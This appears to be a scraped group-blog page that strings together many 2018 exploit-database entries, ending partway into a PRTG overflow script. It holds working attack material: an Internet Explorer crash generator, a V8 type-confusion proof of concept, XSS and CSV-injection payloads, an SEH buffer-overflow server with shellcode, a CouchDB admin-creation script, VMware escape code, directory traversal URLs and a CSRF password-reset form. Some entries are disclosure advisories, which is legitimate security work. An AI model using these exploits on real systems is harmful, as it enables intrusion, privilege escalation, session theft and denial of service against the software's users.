'''
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-(Win-10)-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
=======
www.microsoft.com
Product:
========
Internet Explorer (Windows 10)
v11.371.16299.0
Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.
Vulnerability Type:
==================
Denial Of Service
CVE Reference:
==============
N/A
Security Issue:
================
A null pointer de-reference (read) results in an InternetExplorer Denial of Service (crash) when MSIE encounters an specially crafted
HTML HREF tag containing an empty reference for certain Windows file types. Upon IE crash it will at times daringly attempt to restart itself,
if that occurs and user is prompted by IE to restore their browser session, then selecting this option so far in my tests has shown to repeat the
crash all over again. This can be leveraged by visiting a hostile webpage or link to crash an end users MSIE browser.
Referencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same :)
Tested Windows 10
Stack Dump:
==========
(2e8c.27e4): Access violation - code c0000005 (first/second chance not available)
ntdll!NtWaitForMultipleObjects+0x14:
00007ffa`be5f0e14 c3 ret
0:015> r
rax=000000000000005b rbx=0000000000000003 rcx=0000000000000003
rdx=000000cca6efd3a8 rsi=0000000000000000 rdi=0000000000000003
rip=00007ffabe5f0e14 rsp=000000cca6efcfa8 rbp=0000000000000000
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
r11=0000000000000246 r12=0000000000000010 r13=000000cca6efd3a8
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!NtWaitForMultipleObjects+0x14:
00007ffa`be5f0e14 c3 ret
CONTEXT: (.ecxr)
rax=0000000000000000 rbx=000001fd4a2ec9d8 rcx=0000000000000000
rdx=00007ffabb499398 rsi=000001fd4a5b0ce0 rdi=0000000000000000
rip=00007ffabb7fc646 rsp=000000cca6efe4f8 rbp=000000cca6efe600
r8=0000000000000000 r9=0000000000008000 r10=00007ffabb499398
r11=0000000000000000 r12=0000000000000000 r13=00007ffabb48d060
r14=0000000000000002 r15=0000000000000001
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
KERNELBASE!StrCmpICW+0x6:
00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] ds:00000000`00000000=????
Resetting default scope
FAULTING_IP:
KERNELBASE!StrCmpICW+6
00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 0000000000000000
Attempt to read from address 0000000000000000
DEFAULT_BUCKET_ID: NULL_POINTER_READ
PROCESS_NAME: iexplore.exe
POC video URL:
==============
https://vimeo.com/265691256/
Exploit/POC:
============
1) Run below python script to create "IE-Win10-Crasha.html"
2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10
'''
payload=('<br>\n'+
'<center>MSIE v11.371.16299 Denial Of Service by hyp3rlinx <br>\n'+
'<a href=".cmd:" id="hate">crashy ware shee</a>\n'+
'<br>\n'+
'Tested successfully on Windows 10\n'+
'</center><script>\n'
'function doit(){\n'+
'document.getElementById("hate").click();\n'+
'alert("DOH!");\n'+
'}\n'+
'setInterval("doit()", 2000)\n'+
'</script>')
file=open("IE-Win10-Crasha.html","w")
file.write(payload)
file.close()
print 'MS InternetExplorer (Win 10) '
print 'Denial Of Service File Created.'
print 'hyp3rlinx'
'''
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: April 18, 2018
vendor closes thread : April 19, 2018
April 20, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
'''
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863566988
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
The attached fuzzed swf file causes heap or stack corruption (depending on platform) when rendering a slab.
This PoC crashes a little bit unreliably, it is the most reliable in the standalone Flash player and Microsoft Edge.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44527.zip
/*
https://cs.chromium.org/chromium/src/v8/src/compiler/node-properties.cc?rcl=df84e87191022bf6914f9570069908f10b303245&l=416
Here's a snippet of NodeProperties::InferReceiverMaps.
case IrOpcode::kJSCreate: {
if (IsSame(receiver, effect)) {
HeapObjectMatcher mtarget(GetValueInput(effect, 0));
HeapObjectMatcher mnewtarget(GetValueInput(effect, 1));
if (mtarget.HasValue() && mnewtarget.HasValue()) {
Handle<JSFunction> original_constructor =
Handle<JSFunction>::cast(mnewtarget.Value());
if (original_constructor->has_initial_map()) {
Handle<Map> initial_map(original_constructor->initial_map());
if (initial_map->constructor_or_backpointer() ==
*mtarget.Value()) {
*maps_return = ZoneHandleSet<Map>(initial_map);
return result;
}
}
}
// We reached the allocation of the {receiver}.
return kNoReceiverMaps;
}
break;
}
"mnewtarget" is expected to be a constructor which also can be of type JSBoundFunction. But "mnewtarget" is always cast to JSFunction which leads to type confusion.
The PoC seems not to crash in release mode.
Debug mode log:
#
# Fatal error in ../../src/objects-inl.h, line 566
# Check failed: !v8::internal::FLAG_enable_slow_asserts || (object->IsJSFunction()).
#
==== C stack trace ===============================
/v8/out.gn/x64.debug/./libv8_libbase.so(v8::base::debug::StackTrace::StackTrace()+0x1e) [0x7f4623e1043e]
/v8/out.gn/x64.debug/./libv8_libplatform.so(+0x30907) [0x7f4623db3907]
/v8/out.gn/x64.debug/./libv8_libbase.so(V8_Fatal(char const*, int, char const*, ...)+0x1bd) [0x7f4623df876d]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::JSFunction::cast(v8::internal::Object*)+0x64) [0x7f46226584a4]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::Handle<v8::internal::JSFunction> const v8::internal::Handle<v8::internal::JSFunction>::cast<v8::internal::JSFunction>(v8::internal::Handle<v8::internal::JSFunction>)+0x23) [0x7f4622651173]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::NodeProperties::InferReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::ZoneHandleSet<v8::internal::Map>*)+0x435) [0x7f4622c24a75]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::InferReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, std::__1::vector<v8::internal::Handle<v8::internal::Map>, std::__1::allocator<v8::internal::Handle<v8::internal::Map> > >*)+0x50) [0x7f4622b8b820]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ExtractReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::FeedbackNexus const&, std::__1::vector<v8::internal::Handle<v8::internal::Map>, std::__1::allocator<v8::internal::Handle<v8::internal::Map> > >*)+0x202) [0x7f4622b82632]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ReduceNamedAccessFromNexus(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::FeedbackNexus const&, v8::internal::Handle<v8::internal::Name>, v8::internal::compiler::AccessMode)+0x2e6) [0x7f4622b822b6]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ReduceJSStoreNamed(v8::internal::compiler::Node*)+0x298) [0x7f4622b7c2c8]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::Reduce(v8::internal::compiler::Node*)+0x11f) [0x7f4622b78f7f]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::Reduce(v8::internal::compiler::Node*)+0x285) [0x7f4622ad8c55]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceTop()+0x44f) [0x7f4622ad874f]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceNode(v8::internal::compiler::Node*)+0x1bc) [0x7f4622ad7cfc]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceGraph()+0x2d) [0x7f4622ad89bd]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::InliningPhase::Run(v8::internal::compiler::PipelineData*, v8::internal::Zone*)+0x58a) [0x7f4622c46e2a]
PoC:
*/
// Flags: --allow-natives-syntax --enable_slow_asserts
class Base {
constructor() {
this.x = 1;
}
}
class Derived extends Base {
constructor() {
// JSCreate emitted I guess.
super();
}
}
let bound = Object.bind();
Reflect.construct(Derived, [], bound); // Feed a bound function as new.target to the profiler, so HeapObjectMatcher can find it.
%OptimizeFunctionOnNextCall(Derived);
new Derived();
SEC Consult Vulnerability Lab Security Advisory < 20180423-0 >
=======================================================================
title: Multiple Stored XSS Vulnerabilities
product: WSO2 Carbon, WSO2 Dashboard Server
vulnerable version: WSO2 Identity Server 5.3.0
fixed version: WSO2 Identity Server 5.5.0
CVE number: CVE-2018-8716
impact: high
homepage: https://wso2.com/products/dashboard
found: 2017-12-13
by: W. Schober (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"WSO2 Carbon redefines middleware by providing an integrated and componentized
middleware platform that adapts to the specific needs of any enterprise
IT project - on premise or in the cloud.
100% open source and standards-based, WSO2 Carbon enables developers to rapidly
orchestrate business processes, compose applications and develop services using
WSO2 Developer Studio and a broad range of business and technical services that
integrate with legacy, packaged and SaaS applications.
The lean, complete, OSGi-based platform includes more than 175 components – OSGi
bundles or Carbon features. The WSO2 Carbon core framework functions as
“Eclipse for servers” and includes common capabilities shared by all WSO2
products, such as built-in registry, user management, transports, security,
logging, clustering, caching and throttling services, co-ordination, and a
GUI framework."
Source: https://wso2.com/products/carbon/
"The WSO2 Dashboard Server (formerly WSO2 User Engagement Server) helps to
rapidly create visually appealing and engaging web components such as
dashboards, and gadgets, and unlocking data for business intelligence and
monitoring. With the host of capabilities that Dashboard Server provides
out-of-the-box, going from data to screen has never been easier."
Source: https://wso2.com/products/dashboard-server/
Business recommendation:
------------------------
SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.
Vulnerability overview/description:
-----------------------------------
1) Stored Cross-Site Scripting in WSO2 Dashboard (CVE-2018-8716)
The dashboard is used by the end-users to manage their accounts, change passwords,
alter their profiles, or change certain settings. An attacker is able to inject
arbitrary JavaScript payloads into various textboxes (username, home address,
lastname, firstname, etc).
The payloads are permanently stored in the dashboard and triggered every time the
dashboard is visited. The payload is also potentially triggered in the carbon
part of WSO2, which means that an attacker would be able to inject payloads
from the front-end application into a middleware application, which is not
accessible from the internet and attack administrators.
2) Stored Cross-Site Scripting in WSO2 Carbon
The carbon UI offers a feature to add multiple BPS-Worker Hosts. In the worker
host URL an arbitrary JavaScript payload can be injected and permanently stored
in the web application.
Proof of concept:
-----------------
1) Stored Cross-Site Scripting in WS02 Dashboard
The following input fields are vulnerable and JavaScript payloads can be directly
injected:
- Firstname
- Lastname
- Username
- Address
It is suspected, that all user inputs are returned unfiltered in all server responses.
2) Stored Cross-Site Scripting in WSO2 Carbon
To demonstrate the vulnerability, it is sufficient to add a new BPS worker and set
the URL to the following payload: "><img src=x onerror=aler(document.cookie)>
Everytime the carbon middleware application is accessed, the payload is triggered.
Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the most recent version
at the time of discovery:
* WSO2IS 5.3.0
Vendor contact timeline:
------------------------
2018-01-25: Contacting vendor through security@wso2.com
2018-02-08: Asking for status update. Vendor responds, that they are
still investigating the issue.
2018-02-21: Vendor responds with release date and further details
concerning the nature of the vulnerabilities. The XSS in the
Carbon component was a duplicate and should be already fixed.
Concerning the XSS in the dashboard a fix is implemented
and will be rolled out with the release of WSO2 Identity
Server 5.5.0.
2018-03-14: Requesting CVE from Mitre for the stored XSS in the Dashboard.
2018-03-15: Mitre assigned CVE-2018-8716.
2018-03-26: Vendor informed us, that the final release of the updated
software will be on 5th of April.
2018-04-23: Public Release
Solution:
---------
Update WSO2 Identity Server to 5.5.0
Workaround:
-----------
No workaround available
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
The attached image causes an info leak in image inflation. It occasionally crashes when rendered, otherwise it displays uninitialized memory as pixels.
To reproduce, put the attached images on a webserver and vist: http://127.0.0.1?img=inflate.png.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44528.zip
The attached swf file causes and out-of-bounds write in blur filtering.
This PoC crashes reliably in Firefox for Linux.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44529.zip
# Exploit Title: Shopy Point of Sale v1.0 - CSV Injection
# Date: 2018-04-23
# Exploit Author: 8bitsec
# CVE: CVE-2018-10258
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/shopy-point-of-sales/21730225
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
Release Date:
=============
2018-04-23
Product & Service Introduction:
===============================
Point of sale for retail stores
Technical Details & Description:
================================
A user is able to inject a command that will be included in the exported CSV file.
Proof of Concept (PoC):
=======================
1. Login with Sales user's credentials
2. Browse to Trader > Customer > New Customer and add =cmd|'/C calc'!A1 into the Customer Name field
3. Log in with admin's credentials
4. Browse to Sales > Create Invoice to create an invoice for that user
5. Browse to All Invoice > Export to download and open the exported CSV file
==================
# Exploit Title: Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)
# Date: 2018-04-23
# Exploit Author: Marwan Shamel
# Software Link: https://filehippo.com/download_free_download_manager/925/
# Version: v2.0 Built 417
# Tested on: Windows 7 Enterprise SP1 32 bit
# Special thanks to my wife
# Steps : file > Import > Import lists of downloads > open URL file that includes http://192.168.1.53:81 (HOST|Port changed according to your needs)
#!/usr/bin/python
from socket import *
from time import sleep
host = "192.168.1.53"
port = 81
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
nseh = "\xeb\x88\x90\x90" #Short Jump backward 118bytes (jmp short 0xffffff8a) (more bytes can be jumped backwards depending on the shell code size required )
seh = "\xd1\x9c\x4a\x00" #address to trigger POP-POP-RETURN sequence
# Evil produce a message box 113 bytes can be changed according to your needs
evil = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7"
payload = "\x43" * (1724-255) + "\x90" * 142 + evil + nseh + seh
buffer = "HTTP/1.1 301 Moved Permanently\r\n"
buffer += "Date: Thu, 23 Feb 2018 10:21:08 GMT\r\n"
buffer += "Server: Apache/2.2.22 (Debian)\r\n"
buffer += "Location: "+ payload + "\r\n"
buffer += "Vary: Accept-Encoding\r\n"
buffer += "Content-Length: 8000\r\n"
buffer += "Keep-Alive: timeout=5, max=100\r\n"
buffer += "Connection: Keep-Alive\r\n"
buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"
buffer += "\r\n"
buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
buffer += "<html><head>\n"
buffer += "<title>301 Moved Permanently</title>\n"
buffer += "</head><body>\n"
buffer += "<h1>Moved Permanently</h1>\n"
buffer += "<p>The document has moved <ahref=\""+payload+"\">here</a>.</p>\n"
buffer += "</body></html>\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
sleep(1)
cl.close()
s.close()
#!/usr/bin/env python
'''
@author: r4wd3r
@license: MIT License
@contact: r4wd3r@gmail.com
'''
import argparse
import re
import sys
import requests
parser = argparse.ArgumentParser(
description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +
' (CVE-2017-12635)')
parser.add_argument('host', help='Host to attack.', type=str)
parser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984')
parser.add_argument('-u', '--user', help='Username to create as admin.',
type=str, default='couchara')
parser.add_argument('-P', '--password', help='Password of the created user.',
type=str, default='couchapass')
args = parser.parse_args()
host = args.host
port = args.port
user = args.user
password = args.password
pat_ip = re.compile("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")
if not pat_ip.match(host):
print "[x] Wrong host. Must be a valid IP address."
sys.exit(1)
print "[+] User to create: " + user
print "[+] Password: " + password
print "[+] Attacking host " + host + " on port " + port
url = 'http://' + host + ':' + port
try:
rtest = requests.get(url, timeout=10)
except requests.exceptions.Timeout:
print "[x] Server is taking too long to answer. Exiting."
sys.exit(1)
except requests.ConnectionError:
print "[x] Unable to connect to the remote host."
sys.exit(1)
# Payload for creating user
cu_url_payload = url + "/_users/org.couchdb.user:" + user
cu_data_payload = '{"type": "user", "name": "'+user+'", "roles": ["_admin"], "roles": [], "password": "'+password+'"}'
try:
rcu = requests.put(cu_url_payload, data=cu_data_payload)
except requests.exceptions.HTTPError:
print "[x] ERROR: Unable to create the user on remote host."
sys.exit(1)
if rcu.status_code == 201:
print "[+] User " + user + " with password " + password + " successfully created."
sys.exit(0)
else:
print "[x] ERROR " + str(rcu.status_code) + ": Unable to create the user on remote host."
char *initial_dnd = "tools.capability.dnd_version 4";
static const int cbObj = 0x100;
char *second_dnd = "tools.capability.dnd_version 2";
char *chgver = "vmx.capability.dnd_version";
char *call_transport = "dnd.transport ";
char *readstring = "ToolsAutoInstallGetParams";
typedef struct _DnDCPMsgHdrV4
{
char magic[14];
char dummy[2];
size_t ropper[13];
char shellcode[175];
char padding[0x80];
} DnDCPMsgHdrV4;
void PrepareLFH()
{
char *result = NULL;
char *pObj = malloc(cbObj);
memset(pObj, 'A', cbObj);
pObj[cbObj - 1] = 0;
for (int idx = 0; idx < 1; ++idx) // just occupy 1
{
char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj);
RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); //alloc one to occupy 4
}
free(pObj);
}
size_t infoleak()
{
#define MAX_LFH_BLOCK 512
Message_Channel *chans[5] = {0};
for (int i = 0; i < 5; ++i)
{
chans[i] = Message_Open(0x49435052);
if (chans[i])
{
Message_SendSize(chans[i], cbObj - 1); //just alloc
}
else
{
Message_Close(chans[i - 1]); //keep 1 channel valid
chans[i - 1] = 0;
break;
}
}
PrepareLFH(); //make sure we have at least 7 hole or open and occupy next LFH block
for (int i = 0; i < 5; ++i)
{
if (chans[i])
{
Message_Close(chans[i]);
}
}
char *result = NULL;
char *pObj = malloc(cbObj);
memset(pObj, 'A', cbObj);
pObj[cbObj - 1] = 0;
char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj);
while (1)
{
for (int i = 0; i < MAX_LFH_BLOCK; ++i)
{
RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
}
for (int i = 0; i < MAX_LFH_BLOCK; ++i)
{
Message_Channel *chan = Message_Open(0x49435052);
if (chan == NULL)
{
puts("Message send error!");
Sleep(100);
}
else
{
Message_SendSize(chan, cbObj - 1);
Message_RawSend(chan, "\xA0\x75", 2); //just ret
Message_Close(chan);
}
}
Message_Channel *chan = Message_Open(0x49435052);
Message_SendSize(chan, cbObj - 1);
Message_RawSend(chan, "\xA0\x74", 2); //free
RpcOut_SendOneRaw(dndtransport, strlen(dndtransport), &result, NULL); //trigger double free
for (int i = 0; i < min(cbObj-3,MAX_LFH_BLOCK); ++i)
{
RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL);
Message_RawSend(chan, "B", 1);
RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj))
{
Message_Close(chan); //free the string
for (int i = 0; i < MAX_LFH_BLOCK; ++i)
{
puts("Trying to leak vtable");
RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
size_t p = 0;
if (result)
{
memcpy(&p, result, min(strlen(result), 8));
printf("Leak content: %p\n", p);
}
size_t low = p & 0xFFFF;
if (low == 0x74A8 || //RpcBase
low == 0x74d0 || //CpV4
low == 0x7630) //DnDV4
{
printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000);
return (p & (~0xFFFF)) - 0x7a0000;
}
RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
}
}
}
Message_Close(chan);
}
return 0;
}
void exploit(size_t base)
{
char *result = NULL;
char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141);
char *pObj = malloc(cbObj);
memset(pObj, 0, cbObj);
DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4));
memset(hdr, 0, sizeof(DnDCPMsgHdrV4));
memcpy(hdr->magic, call_transport, strlen(call_transport));
while (1)
{
RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
for (int i = 0; i < MAX_LFH_BLOCK; ++i)
{
Message_Channel *chan = Message_Open(0x49435052);
Message_SendSize(chan, cbObj - 1);
size_t fake_vtable[] = {
base + 0xB87340,
base + 0xB87340,
base + 0xB87340,
base + 0xB87340};
memcpy(pObj, &fake_vtable, sizeof(size_t) * 4);
Message_RawSend(chan, pObj, sizeof(size_t) * 4);
Message_Close(chan);
}
RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL);
RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL);
//check pwn success?
RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
if (*(size_t *)result == 0xdeadbeefc0debabe)
{
puts("VMware escape success! \nPwned by KeenLab, Tencent");
RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);//fix dnd to callable prevent vmtoolsd problem
RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
return;
}
//host dndv4 fill in, try to clean up and free again
Sleep(100);
puts("Object wrong! Retry...");
RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
}
}
int main(int argc, char *argv[])
{
int ret = 1;
__try
{
while (1)
{
size_t base = 0;
do
{
puts("Leaking...");
base = infoleak();
} while (!base);
puts("Pwning...");
exploit(base);
break;
}
}
__except (ExceptionIsBackdoor(GetExceptionInformation()) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
{
fprintf(stderr, NOT_VMWARE_ERROR);
return 1;
}
return ret;
}
# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability
# Date: 2018-04-20
# Software Vendor: NComputing
# Software Link:
# Author: Javier Bernardo
# Contact: javier@kwell.net
# Website: http://www.kwell.net
# CVE: CVE-2018-10201
# Category: Webapps
#[Description]
#
#It is possible to read arbitrary files outside the root directory of
#the web server. This vulnerability could be exploited remotely by a
#crafted URL without credentials, with …/ or …\ or …./ or ….\ as a
#directory-traversal pattern to TCP port 8667.
#
#An attacker can make use of this vulnerability to step out of the root
#directory and access other parts of the file system. This might give
#the attacker the ability to view restricted files, which could provide
#the attacker with more information required to further compromise the system.
#[PoC]
nmap -p T:8667 -Pn your_vSpace_server
Nmap scan report for your_vSpace_server (x.x.x.x)
Host is up (0.044s latency).
PORT STATE SERVICE
8667/tcp open unknown
http://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini
http://your_vSpace_server:8667/...\...\...\...\...\...\...\...\...\windows\win.ini
http://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini
http://your_vSpace_server:8667/....\....\....\....\....\....\....\....\....\windows\win.ini
# Exploit Title: WUZHI CMS 4.1.0 - Cross-Site Request Forgery
# Date: 2018-04-23
# Exploit Author: jiguang (s1@jiguang.in)
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE: CVE-2018-10312
An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/132)
There is a csrf vulnerability that can modifying the member's password. via index.php?m=member&v=pw_reset
After the member logged in. open the exp page
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/www/index.php?m=member&v=pw_reset" method="POST">
<input type="hidden" name="password" value="yuduo" />
<input type="hidden" name="password2" value="yuduo" />
<input type="hidden" name="submit" value="确 定" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Monstra cms 3.0.4 - Persitent Cross-Site Scripting
# Date: 2018-04-14
# Exploit Author: Wenming Jiang
# Vendor Homepage: https://github.com/monstra-cms/monstra
# Software Link: https://github.com/monstra-cms/monstra
# Version: 3.0.4
# Tested on: php 5.6, apache2.2.29, macos 10.12.6
# CVE :CVE-2018-10109
#Description:
#Monstra CMS 3.0.4 has a stored XSS vulnerability when an attacker has access to the editor role, and enters the payload
#in the content section of a new page in the blog catalog.
#Steps to replicate:
#1. log into the system as an editor role
#2. creat a new page in the blog catalog
#3. navigate to content section
#4. enter payload: <script>alert(document.cookie)</script>
#5. visit http://<your_site>/monstra/blog/<page_name>.php, you will triage JavaScript execution
#Exploit Code:
<script>alert(document.cookie)</script>
or
<img src=1 onerror=alert(/xss/) >
# Exploit Title: UK Cookie Consent v2.3.9 - Persistent Cross-Site Scripting
# Date: 2018-04-22
# Exploit Author: B0UG
# Vendor Homepage: https://catapultthemes.com/
# Software Link: https://en-gb.wordpress.org/plugins/uk-cookie-consent/#description
# Version: Tested on version 2.3.9 (older versions may also be affected)
# Tested on: WordPress
# Category : Webapps
# CVE: CVE-2018-10310
I. VULNERABILITY
-------------------------
Persistent Cross-Site Scripting
II. BACKGROUND
-------------------------
UK Cookie Consent is a WordPress plugin which has been designed to display cookie consent notifications on a WordPress website.
III. DESCRIPTION
-------------------------
A persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in a victim's web browser.
IV. PROOF OF CONCEPT
-------------------------
1) Access WordPress control panel.
2) Navigate to the 'Pages'.
3) Add a new page and insert the script you wish to inject into the page title.
4) Now navigate to 'Settings' and select 'Cookie Consent'.
5) Now click on the 'Content' tab.
6) Your injected script will now be executed.
V. IMPACT
-------------------------
An attacker can execute malicious code in a victim user's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.
VI. SYSTEMS AFFECTED
-------------------------
WordPress websites running "UK Cookie Consent" plugin version 2.3.9 (older versions may also be affected).
VII. REMEDIATION
-------------------------
Update to the latest version available. Implement a web application such as Wordfence.
VIII. DISCLOSURE TIMELINE
-------------------------
April 22, 2018 1: Vulnerability identified.
April 22, 2018 2: Informed developer of the vulnerability.
April 23, 2018 3: Developer acknowledged the vulnerability.
April 23, 2018 4: Developer issued a security patch.
Special thanks goes to the team at Catapult Themes for their fast response, great understanding and patching the issue.
# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow
# Date: 2018-04-21
# Exploit Author: Lucas "luriel" Carmo
# Vendor Homepage: https://www.paessler.com/prtg
# Software Link: https://www.paessler.com/download/prtg-download
# Version: 18.1.39.1648
# CVE : CVE-2018-10253
# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5
# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/
#!/usr/bin/python
import requests
import sys
import os
import re
import socket
green = "\033[1;32m"
yellow = '\033[1;33m'
normal = '\033[0;0m'
banner = """
██╗███████╗██╗ ██╗██╗███████╗██╗ ██╗ ███╗ ██╗ █████╗ ██████╗ █████╗ ██╗ ███╗ ███╗
